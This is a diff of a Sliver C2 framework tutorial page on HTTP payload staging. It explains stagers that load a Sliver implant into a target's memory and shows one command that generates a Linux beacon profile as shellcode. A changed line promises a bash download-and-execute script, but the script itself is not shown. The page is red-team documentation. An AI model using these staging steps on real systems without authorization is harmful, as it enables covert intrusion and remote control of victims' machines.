BishopFox/sliver/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md

 When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system.
 Sliver can generate shellcode for your stager to execute by using the `profiles` command.

-For this exercise we will create a new profile:
+For this exercise we will create a new beacon profile for linux, stage it and use a bash script to download and execute

 ```
 [server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1